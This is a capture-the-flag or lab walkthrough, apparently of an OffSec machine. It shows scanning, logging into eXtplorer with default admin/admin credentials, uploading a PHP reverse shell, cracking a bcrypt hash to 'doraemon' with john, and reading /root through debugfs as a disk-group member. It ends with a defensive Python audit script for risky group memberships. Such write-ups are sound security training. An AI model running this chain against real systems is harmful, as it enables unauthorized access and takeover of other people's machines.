Key takeaways
- Uploading a shell via weak (default) credentials
- Privilege escalation via mount access
Detailed steps
Run an nmap scan; ports 80 and 22 are found open.
Nmap scan report for #remote_ip#
Host is up (0.00096s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (91%)
Next, run nikto against port 80. WordPress appears to be installed, but after looking into it, WordPress does not turn out to be worth much here; wpscan can still be run against it.
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: #remote_ip#
+ Target Hostname: #remote_ip#
+ Target Port: 80
+ Start Time: 2024-09-22 11:20:08 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://192.168.51.16/wp-admin/setup-config.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /license.txt: License file found may identify site software.
+ /wordpress/: Directory indexing found.
+ 8104 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-09-22 11:20:20 (GMT0) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Brute-force paths with dirsearch, dirb, gobuster or a similar tool; dirsearch is used here, and it reveals an exposed /filemanager path.
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> dirsearch -u #remote_ip# -w /usr/share/wordlists/dirb/big.txt -x 404,502
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 20469
Output File: /home/kali/Documents/OFFSEC/GoToWork/Extplorer/reports/_192.168.162.16/_24-09-22_09-34-11.txt
Target: http://#remote_ip#/
[09:34:17] Starting:
[09:39:24] 301 - 322B - /filemanager -> http://192.168.162.16/filemanager/
Visiting it shows the eXtplorer login page. A quick Google search reveals that eXtplorer's default credentials are admin/admin; trying them logs in successfully, and the account has write permission.
Locally, run nc -nlvp 9000.
Edit the local /usr/share/webshells/php/php-reverse-shell.php, setting the ip and port to the local server's IP and port 9000, then create a shell.php file under http://#remote_ip#/filemanager/ and paste in the contents of /usr/share/webshells/php/php-reverse-shell.php.
Browse to http://#remote_ip#/filemanager/shell.php; the reverse shell is established.
Trying linpeas, sudo -l and similar methods turns up nothing beyond the /home/dora user (sudo is version 1.8.31, which looks like a vulnerable version, but several exploits were tried without success). Continuing to look through the files in the filemanager, filemanager/config/.htuser.php contains what appears to be dora's password hash.
Copy it out and try to crack it; the result is doraemon.
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> john dora.passwd --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 256 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
doraemon (?)
1g 0:00:00:02 DONE (2024-09-22 09:12) 0.3436g/s 519.5p/s 519.5c/s 519.5C/s gonzalez..something
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Use the recovered password to run su dora in the reverse shell.
C:\home\kali\Documents\OFFSEC\GoToWork\Extplorer> nc -nlvp 9000
listening on [any] 9000 ...
connect to [192.168.45.223] from (UNKNOWN) [#remote_ip#] 60672
Linux dora 5.4.0-146-generic #163-Ubuntu SMP Fri Mar 17 18:26:02 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
13:29:10 up 2:07, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ su dora
Password: doraemon
id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)
dora is a member of the disk group; following the method described in Interesting Groups - Linux Privesc | HackTricks, root access is obtained.
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.2G 55% /
udev 947M 0 947M 0% /dev
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 199M 1.2M 198M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop2 50M 50M 0 100% /snap/snapd/18596
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop3 92M 92M 0 100% /snap/lxd/24061
/dev/loop4 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
tmpfs 199M 0 199M 0% /run/user/1000
debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: cd /root
cd /root
debugfs: ls
ls
131076 (12) . 2 (12) .. 265478 (12) .ssh 265574 (12) snap
131077 (16) .bashrc 131078 (16) .profile 142303 (24) .bash_history
265709 (16) .cache 265469 (36) .local 132363 (20) proof.txt
132531 (3908) flag4.txt
debugfs: cat proof.txt
cat proof.txt
7f9f1d41e70748253c122cf12930d1a9
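As an added defender-side check (not part of the original writeup), the following Python script parses /etc/group-style data and flags non-root members of groups such as disk that make file permissions irrelevant, which is exactly the misconfiguration the debugfs step above relies on. The group list and the sample /etc/group content are constructed for this example.

```python
"""Flag non-root members of Linux groups that grant root-equivalent access.

Added example, not from the original writeup. Membership in 'disk' is what let
'dora' read /root through debugfs: the group owns the raw block devices, so
normal file permissions no longer apply. The group list below is an assumption
of this example, not an exhaustive reference.
"""
from typing import Dict, List, Tuple

HIGH_RISK_GROUPS: Dict[str, str] = {
    "disk":   "raw access to block devices (e.g. debugfs on the root LV)",
    "shadow": "can read password hashes in /etc/shadow",
    "docker": "can run containers with the host filesystem mounted",
    "lxd":    "can launch LXD containers with the host filesystem mounted",
    "sudo":   "sudo rights; verify what /etc/sudoers actually grants",
}


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Parse /etc/group content into {group_name: [supplementary members]}."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue  # malformed entry: skip rather than abort the audit
        groups[fields[0]] = [m for m in fields[3].split(",") if m]
    return groups


def find_risky_members(group_text: str, ignore=("root",)) -> List[Tuple[str, str, str]]:
    """Return sorted (user, group, reason) for each non-root member of a risky group."""
    findings = []
    for group, members in parse_group_file(group_text).items():
        if group in HIGH_RISK_GROUPS:
            findings += [(u, group, HIGH_RISK_GROUPS[group])
                         for u in members if u not in ignore]
    return sorted(findings)


# Constructed sample modelled on the compromised host: dora sits in disk (gid 6).
SAMPLE_GROUP_FILE = "root:x:0:\ndisk:x:6:dora\nshadow:x:42:\nsudo:x:27:\nwww-data:x:33:\ndora:x:1000:\n"

if __name__ == "__main__":
    # On a live host, replace SAMPLE_GROUP_FILE with open("/etc/group").read()
    for user, group, reason in find_risky_members(SAMPLE_GROUP_FILE):
        print(f"[!] {user} is in '{group}': {reason}")
```

Running it against a real /etc/group turns the disk-group finding into a routine audit item instead of something discovered only after the box is already owned.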